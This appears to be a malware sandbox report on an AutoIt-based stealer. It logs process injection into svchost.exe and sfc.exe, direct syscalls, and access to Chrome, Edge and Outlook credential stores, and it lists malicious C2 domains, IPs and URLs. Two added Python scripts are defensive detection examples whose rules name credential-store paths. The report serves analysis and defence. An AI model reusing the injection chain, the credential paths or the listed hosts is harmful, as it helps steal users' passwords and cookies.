            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtResumeThread: Direct from: 0x77752FBC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtReadVirtualMemory: Direct from: 0x77752E8C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtCreateKey: Direct from: 0x77752C6C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtSetInformationThread: Direct from: 0x77752B4C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtQueryAttributesFile: Direct from: 0x77752E6C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtAllocateVirtualMemory: Direct from: 0x77753C9C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtClose: Direct from: 0x77752B6C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtCreateMutant: Direct from: 0x777535CC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtWriteVirtualMemory: Direct from: 0x77752E3C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtMapViewOfSection: Direct from: 0x77752D1C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtResumeThread: Direct from: 0x777536AC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtReadFile: Direct from: 0x77752ADC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtQuerySystemInformation: Direct from: 0x77752DFC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtDelayExecution: Direct from: 0x77752DDC
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtAllocateVirtualMemory: Direct from: 0x77752BFC
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sfc.exe | Thread register set: target process: 7616
            Source: C:\Windows\SysWOW64\sfc.exe | Thread APC queued: target process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: BE1008
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | Process created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: eoIIBcxUj3.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: XProgram Manager
            Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
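Read together, the rows of this section describe two things: UJarIfYl5U.exe invoking Nt* services directly from the listed addresses rather than through the normal API path (the set covers allocate, protect, write, map, create-process and resume, i.e. a complete injection toolkit), and a chain of cross-process writes that runs from eoIIBcxUj3.exe into svchost.exe, from there into UJarIfYl5U.exe and sfc.exe, and from sfc.exe into firefox.exe and thread 7616. The script below is an added example, not Joe Sandbox code: it restates a subset of the syscall rows and the section/APC/context/memory-write rows with " | " between the report's source and detail columns, tallies the direct syscalls against a list of injection primitives (that list and the separator are assumptions of this example), and walks the write graph from the sample. One caveat the report does not resolve: it records that NtSetInformationThread was called directly, not which information class was passed, so do not read it as ThreadHideFromDebugger without checking the trace.

```python
"""Summarise the direct Nt* syscalls and the cross-process writes from this report.

Added example for this report, not Joe Sandbox code. The rows are a subset of this
section's syscall rows plus its section/APC/context/memory-write rows, restated with
' | ' between the report's source and detail columns; the set of injection primitives
checked for is an assumption of this example.
"""
import ntpath
import re

# Constructed input: rows from this report (the syscall list is trimmed to nine rows).
ROWS = r'''
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtSetInformationThread: Direct from: 0x777463F9
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtProtectVirtualMemory: Direct from: 0x77752F9C
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtAllocateVirtualMemory: Direct from: 0x777548EC
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtAllocateVirtualMemory: Direct from: 0x77752BEC
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtCreateUserProcess: Direct from: 0x7775371C
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtWriteVirtualMemory: Direct from: 0x7775490C
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtQueryInformationProcess: Direct from: 0x77752C26
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtResumeThread: Direct from: 0x77752FBC
Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe | NtMapViewOfSection: Direct from: 0x77752D1C
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sfc.exe | Thread register set: target process: 7616
Source: C:\Windows\SysWOW64\sfc.exe | Thread APC queued: target process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe
Source: C:\Users\user\Desktop\eoIIBcxUj3.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: BE1008
'''.strip().splitlines()

SYSCALL_RE = re.compile(r'^Source: (?P<proc>.+?) \| (?P<api>Nt\w+): Direct from: (?P<addr>0x[0-9A-Fa-f]+)$')
SECTION_RE = re.compile(r'^Source: (?P<src>.+?) \| Section loaded: NULL target: (?P<dst>.+?) protection: (?P<prot>.+)$')
APC_RE = re.compile(r'^Source: (?P<src>.+?) \| Thread APC queued: target process: (?P<dst>.+)$')
CONTEXT_RE = re.compile(r'^Source: (?P<src>.+?) \| Thread register set: target process: (?P<dst>\S+)$')
WRITE_RE = re.compile(r'^Source: (?P<src>.+?) \| Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)$')

# Assumed list: the Nt* services a user-mode injector needs; which ones show up
# as direct calls tells you how much of the injection path bypasses API hooks.
INJECTION_PRIMITIVES = {
    'NtAllocateVirtualMemory', 'NtProtectVirtualMemory', 'NtWriteVirtualMemory',
    'NtMapViewOfSection', 'NtCreateUserProcess', 'NtResumeThread',
    'NtQueueApcThread', 'NtSetContextThread',
}


def name(target):
    """Process paths become case-folded file names; bare PIDs stay as written."""
    return ntpath.basename(target).lower() if '\\' in target else target


def parse_direct_syscalls(rows):
    """{process: {api: [call-site addresses]}} for every 'Direct from' row."""
    found = {}
    for row in rows:
        m = SYSCALL_RE.match(row)
        if m:
            found.setdefault(name(m['proc']), {}).setdefault(m['api'], set()).add(m['addr'])
    return {proc: {api: sorted(addrs) for api, addrs in apis.items()} for proc, apis in found.items()}


def primitives_covered(apis):
    """Split the assumed primitive list into (seen as direct syscalls, not seen)."""
    seen = set(apis)
    return sorted(INJECTION_PRIMITIVES & seen), sorted(INJECTION_PRIMITIVES - seen)


def parse_cross_process(rows):
    """(source, target, action) edges for every cross-process write-like row, in report order."""
    edges = []
    for row in rows:
        if m := SECTION_RE.match(row):
            edges.append((name(m['src']), name(m['dst']), f'section mapped ({m["prot"]})'))
        elif m := APC_RE.match(row):
            edges.append((name(m['src']), name(m['dst']), 'apc queued'))
        elif m := CONTEXT_RE.match(row):
            edges.append((name(m['src']), name(m['dst']), 'thread context set'))
        elif m := WRITE_RE.match(row):
            edges.append((name(m['src']), name(m['dst']), f'memory written at 0x{m["base"]}'))
    return edges


def injection_chain(edges, root):
    """Depth-first walk of the write graph from root, following rows in the order logged."""
    order, seen, stack = [], set(), [root]
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        order.append(node)
        for src, dst, _ in reversed(edges):  # reversed so pop() yields the earliest row first
            if src == node and dst not in seen:
                stack.append(dst)
    return order


if __name__ == '__main__':
    for proc, apis in parse_direct_syscalls(ROWS).items():
        present, missing = primitives_covered(apis)
        print(f'{proc}: {len(apis)} distinct direct syscalls; present={present} missing={missing}')
    edges = parse_cross_process(ROWS)
    for src, dst, action in edges:
        print(f'{src} -> {dst}: {action}')
    print('reachable from eoiibcxuj3.exe:', injection_chain(edges, 'eoiibcxuj3.exe'))
```

The output shows six of the eight assumed primitives invoked directly by UJarIfYl5U.exe (the APC and thread-context steps appear in the report as sfc.exe behaviour rather than as direct syscalls) and a write graph in which every process in the chain is reachable from the original sample, which is the evidence that the later stages are injected rather than independently launched.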

            Stealing of Sensitive Information

            Source: Yara match | File source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\sfc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
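The rows above are the theft itself: a process running as sfc.exe opens the Chromium Login Data, Cookies, Web Data and Local State files of Chrome and Edge and the Outlook profile keys, while elsewhere in this report the same process has loaded winsqlite3.dll, vaultcli.dll and dpapi.dll and carries the Chromium password_notes table schema in memory. The detection logic a practitioner wants here is "known credential store touched by a process that is not its owner", with the DLL loads used only as corroboration, because dpapi.dll and winsqlite3.dll are loaded by plenty of benign software. The script below is an added example and not Joe Sandbox code; it restates a handful of this report's file, registry and DLL-load rows with " | " between the report's source and detail columns (that separator, the store patterns, the owner lists and the DLL table are all assumptions of this example) and runs that logic over them.

```python
"""Flag credential-store access by a process that does not own the store.

Added example for this report, not Joe Sandbox code. The rows are file, registry and
DLL-load rows from this report, restated with ' | ' between the report's source and
detail columns; the store patterns, the owner lists and the DLL table are assumptions
of this example.
"""
import ntpath
import re

# Constructed input: rows from this report (sfc.exe is the injected FormBook stage).
ROWS = r'''
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sfc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\sfc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\sfc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\sfc.exe | Section loaded: dpapi.dll
'''.strip().splitlines()

ROW_RE = re.compile(
    r'^Source: (?P<proc>.+?) \| (?P<action>File opened|File read|Key opened|Section loaded): (?P<target>.+)$'
)

# (pattern over the lower-cased target, store label, processes allowed to touch it)
STORE_RULES = [
    (re.compile(r'\\google\\chrome\\user data\\.*(login data|cookies|web data|local state)$'),
     'Chrome credential/cookie store', {'chrome.exe'}),
    (re.compile(r'\\microsoft\\edge\\user data\\.*(login data|cookies|web data|local state)$'),
     'Edge credential/cookie store', {'msedge.exe'}),
    (re.compile(r'\\mozilla\\firefox\\(profiles\.ini|.*(logins\.json|key4\.db|cookies\.sqlite))$'),
     'Firefox profile store', {'firefox.exe'}),
    (re.compile(r'^hkey_current_user\\software\\microsoft\\(office\\[0-9.]+\\outlook\\profiles'
                r'|windows nt\\currentversion\\windows messaging subsystem\\profiles)'),
     'Outlook mail profile', {'outlook.exe'}),
]

# Loads that only corroborate a theft once the same process has touched a store;
# on their own they are far too common to alert on.
CREDENTIAL_DLLS = {
    'vaultcli.dll': 'Windows Credential Vault API',
    'winsqlite3.dll': 'SQLite, reads Login Data / Cookies / Web Data databases',
    'dpapi.dll': 'DPAPI, unwraps browser master keys and Outlook secrets',
}


def classify_store(target):
    """Return (label, owners) for a known credential store path or key, else None."""
    lowered = target.lower()
    for rule, label, owners in STORE_RULES:
        if rule.search(lowered):
            return label, owners
    return None


def analyze(rows):
    """Store accesses by non-owners first, then credential DLL loads by those same processes."""
    events = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:
            events.append((ntpath.basename(m['proc']).lower(), m['action'], m['target']))
    hits = []
    for proc, action, target in events:
        if action == 'Section loaded':
            continue
        store = classify_store(target)
        if store and proc not in store[1]:
            hits.append(('credential_store_access', proc, store[0], target))
    thieves = {h[1] for h in hits}
    for proc, action, target in events:
        dll = target.lower()
        if action == 'Section loaded' and proc in thieves and dll in CREDENTIAL_DLLS:
            hits.append(('credential_dll_loaded', proc, dll, CREDENTIAL_DLLS[dll]))
    return hits


if __name__ == '__main__':
    for hit in analyze(ROWS):
        print(*hit)
```

Firefox reading its own profiles.ini produces nothing, sfc.exe produces five store hits and three corroborating DLL loads. The owner lists are deliberately short; on a real fleet they need the backup agents and password managers that legitimately read these files, or the rule will page on every backup window.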

            Remote Access Functionality

            Source: Yara match | File source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (numbers in parentheses are the counts shown in the report matrix):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | DLL Side-Loading (1) | Process Injection (412) | Virtualization/Sandbox Evasion (2) | OS Credential Dumping (1) | Security Software Discovery (211) | Remote Services | Email Collection (1) | Ingress Tool Transfer (3) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Abuse Elevation Control Mechanism (1) | Process Injection (412) | LSASS Memory | Virtualization/Sandbox Evasion (2) | Remote Desktop Protocol | Data from Local System (1) | Non-Application Layer Protocol (4) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | DLL Side-Loading (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | System Information Discovery (12) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 1653437, Sample: eoIIBcxUj3, Start date: 01/04/2025, Architecture: WINDOWS, Score: 100

Start
  DNS/IP: www.l33900.xyz; www.031233226.xyz (signature: Performs DNS queries to domains with low reputation); 12 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 3 other signatures
  -> eoIIBcxUj3.exe (4) [started]
       Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; 2 other signatures
       -> svchost.exe [started]
            Signatures: Maps a DLL or memory area into another process
            -> UJarIfYl5U.exe [injected]
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                 -> sfc.exe (13) [started]
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                      -> UJarIfYl5U.exe [injected]
                           DNS/IP: www.cruycq.info 47.83.1.90, ports 49732, 49733, 49734, VODANETInternationalIP-BackboneofVodafoneDE, United States; www.milp.store 194.9.94.85, port 80, LOOPIASE, Sweden; 4 other IPs or domains
                           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      -> firefox.exe [started]

Source | Detection | Scanner | Label
eoIIBcxUj3.exe | 75% | Virustotal |
eoIIBcxUj3.exe | 79% | ReversingLabs | Win32.Trojan.AgentTesla
eoIIBcxUj3.exe | 100% | Avira | TR/AD.Swotter.hefoh
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk | 100% | Avira URL Cloud | malware
http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk | 100% | Avira URL Cloud | malware
http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk | 100% | Avira URL Cloud | malware
http://www.sigaque.today/n61y/ | 100% | Avira URL Cloud | malware
http://www.l33900.xyz | 100% | Avira URL Cloud | malware
http://www.l33900.xyz/gwiz/ | 100% | Avira URL Cloud | malware
http://www.woodsplace.net/cu04/ | 0% | Avira URL Cloud | safe
http://www.qzsazi.info/iwsk/ | 100% | Avira URL Cloud | malware
https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/ | 0% | Avira URL Cloud | safe
http://www.cruycq.info/0vwm/ | 100% | Avira URL Cloud | malware
https://wx.longwaysun.com/app/register.php?site_id=2 | 0% | Avira URL Cloud | safe
http://www.woodsplace.net/cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= | 0% | Avira URL Cloud | safe
http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk | 100% | Avira URL Cloud | malware


Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.l33900.xyz | 162.218.30.235 | true | false | | high
www.qzsazi.info | 47.83.1.90 | true | false | | high
woodsplace.net | 13.248.213.45 | true | false | | high
031233226.xyz | 144.76.229.203 | true | false | | high
www.sigaque.today | 104.21.32.1 | true | false | | high
www.milp.store | 194.9.94.85 | true | false | | unknown
www.cruycq.info | 47.83.1.90 | true | false | | unknown
www.woodsplace.net | unknown | unknown | false | | high
www.f66el619d.shop | unknown | unknown | false | | unknown
www.elevatetextiles.net | unknown | unknown | false | | high
www.vipstargold.buzz | unknown | unknown | false | | high
www.kitculture.shop | unknown | unknown | false | | high
www.031233226.xyz | unknown | unknown | false | | high
www.alplace.site | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk | false | Avira URL Cloud: malware | unknown
http://www.cruycq.info/0vwm/ | false | Avira URL Cloud: malware | unknown
http://www.woodsplace.net/cu04/ | true | Avira URL Cloud: safe | unknown
